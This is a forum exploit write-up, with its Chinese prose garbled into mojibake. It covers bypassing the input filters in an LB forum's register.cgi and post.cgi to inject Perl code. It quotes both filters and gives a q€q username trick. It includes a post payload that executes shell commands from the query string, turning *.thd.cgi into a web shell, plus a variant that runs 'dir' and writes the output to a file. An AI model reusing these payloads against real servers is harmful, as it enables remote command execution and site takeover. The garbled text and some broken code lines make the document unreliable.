©¶´Ô­Àí£º
ÀûÓÃÁ˶ÔÓû§ÊäÈëµÄ¹ýÂ˲»ÑÏ£¬±àд´úÂ룬´Ó¶ø»ñµÃshell¡£
½áºÏÀûÓÃregister.cgi ºÍpost.cgi ¹ýÂ˲»ÑÏ¡£

1¡¢¿´ÏÂlb ÂÛ̳µÄregister.cgi×¢²áÖеĹýÂË£¬

for ('inmembername'...)
$tp = $query->param($_);
$tp = &unHTML("$tp");
${$_} = $tp;
}

sub unHTML {} ÀïÃæµÄ¶«Î÷²»ÖØÒª¡£

&error("Óû§×¢²á&¶Ô²»Æð£¬ÄúÊäÈëµÄÓû§ÃûÓÐÎÊÌ⣬Çë²»ÒªÔÚÓû§ÃûÖаüº¬\@\#\$\%\^\*\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]ÕâÀà×Ö·û£¡") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=
\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]/);
if($inmembername =~ /_/) { &error("Óû§×¢²á&Çë²»ÒªÔÚÓû§ÃûÖÐʹÓÃÏ»®Ïߣ¡"); }

$inmembername =~ s/\ \;//ig;
$inmembername =~ s/¡¡/ /g;
$inmembername =~ s/©¡/ /g;
$inmembername =~ s/[ ]+/ /g;
$inmembername =~ s/[ ]+/_/;
$inmembername =~ s/[_]+/_/;
$inmembername =~ s/ÿ//isg;
$inmembername =~ s///isg;
$inmembername =~ s/¡¡//isg;
$inmembername =~ s/©¡//isg;
$inmembername =~ s/()+//isg;
$inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\(\)\+\=
\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
$inmembername =~ s/\s*$//g;
$inmembername =~ s/^\s*//g;

&error("Óû§×¢²á&¶Ô²»Æð£¬ÄúÊäÈëµÄÓû§ÃûÓÐÎÊÌâ") if ($inmembername =~ /^q(.+?)-/ig);

$inmembername =~ /guest/i)
||($inmembername =~ /qq-/i)
||($inmembername =~ /q-/i)
||($inmembername =~ /qx-/i)
||($inmembername =~ /qw-/i)
||($inmembername =~ /qr-/i)
||($inmembername =~ /no)
||($inmembername eq "admin")
||($inmembername display/i)
||($inmembername =~ /^system/i)
||($inmembername =~ /---/ieq "root")
||($inmembername eq "copy")
||($inmembername =~ /^sub/)
||($inmembername =~ /^exec/)
||($inmembername =~ /\@ARGV/i)
||($inmembername =~ /^require/)
||($inmembername =~ /^rename/i)
||($inmembername =~ /^dir/i)
||($inmembername =~ /^print/i)
||($inmembername =~ /^con/i)
||($inmembername =~ /^nul/i)
||($inmembername =~ /^aux/i)
||($inmembername =~ /^com/i)
||($inmembername =~ /^lpt/i));

µÈµÈ¡£

¹ýÂ˵Äͦ³¹µ×µÄŶ~

µ«ÊǺöÂÔÁË q¼° qq¡¢qwµÈµÄÔËÓû¹¿ÉÒÔÓÃЩÌØÊâµÄ·ûºÅµÄ£º£©£¬ÕâÊÇ×î¹Ø¼üµÄÒ»²½¡£

2¡¢ÔÙ¿´ÏÂpost.cgiÀï¶Ô·¢ÌùµÄ¹ýÂË

for ('forum','topic','membername','password','
action','postno','inshowsignature',
'notify','inshowemoticons','intopictitle','inshowchgfont',
'inpost','posticon','inhiddentopic','postweiwang','
moneyhidden','moneypost','uselbcode','inwater') {
next unless defined $_;
next if $_ eq 'SEND_MAIL';
$tp = $query->param($_);
$tp = &cleaninput("$tp");
${$_} = $tp;
}

sub cleaninput {
my ($self, $text) = _self_or_default(@_);
# my $text = shift;
study($text);
$text =~ s/[\a\f\e\0\r\t]//isg;
$text =~ s/\ / /g;
$text =~ s/\@ARGV/\&\#64\;ARGV/isg;
$text =~ s/\;/\&\#59\;/isg;
$text =~ s/\&/\&/g;
$text =~ s/\&\#/\&\#/isg;
$text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg;
$text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg;
$text =~ s/"/\"/g;
$text =~ s/ / \ /g;
$text =~ s/</\&lt;/g;
$text =~ s/>/\&gt;/g;
$text =~ s/ / /g;
$text =~ s/\n\n/<p>/g;
$text =~ s/\n/<br>/g;
$text =~ s/document.cookie/documents\&\#46\;cookie/isg;
$text =~ s/'/\&\#039\;/g;
$text =~ s/#/#/isg;
$text =~ s/&#/&#/isg;
return $text;
}

Ö»Òª±àдµÄ´úÂëÈĹýÉÏÃæµÄ¹ýÂËÄÜÔËÐУ¬¾Í¿ÉÒԵġ£

3¡¢Èç´ËÕë¶Ôwin2000µÄ»ú×Ó¿ÉÒÔÓÐÏÂÃæµÄ·½·¨È¡µÄshellµÄ
ÓÃperl.exe ½âÎöµÄ»°

Óà q€q ΪÓû§Ãû×¢²á € ºóÃæËæÒâд£¬×ÔȻҲ¿ÉÒÔÓñðµÄ·ûºÅµÄ£¬
Ëû¿É²»ÊÇ Óà s/\`\~\!\@\#\$\%\^\&\*\(\)\+\=
\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
~ /^q(.+?)-/ig

($inmembername =~ /qq-/i)||($inmembername =
~ /q-/i)||($inmembername =~ /qx-/i)||($inmembername =
~ /qw-/i)||($inmembername =~ /qr-/i)
¾ÍÄÜÈ«²¿¹ýÂ˵ôµÄ£º£©¡£

½Ó×ÅÖ»ÒªÔÚ·¢ÌùµÄÄÚÈÝÖÐдÈë

€ and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out)

¸ÃforumÏÂ*.thd.cgi ¾ÍÊǸö¼òµ¥µÄshellÁË¡£

Óà perlis.dll½âÎöµÄ»°£¬¹¹ÔìºÃµÄ»°£¬Ò²ÄÜʵÏÖÄ¿µÄµÄ¡££¨ÊÔÁËÏ£¬¿ÉÒÔÓÃ
€ and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1|256)and print AA @s
(ÓÉÓÚ¹ýÂËÁË >,Õâ¸öÏëÁ˺þ㬿ÉÄÜÄã»áÓиüºÃµÄ·½·¨µÄ¡££©ÄÜ¿´µ½»áÔ±µÈĿ¼µÄ£¬ÏëÖ´ÐбðµÄÃüÁÐÞ¸Ä$cmd¾Í¿ÉÒÔÁË£»¸Äºó׺ÃûÉÏ´«¸öshell£¬È»ºó¸Ä»ØÀ´¾Í¿ÉÒÔ»ñµÃshellÁË¡£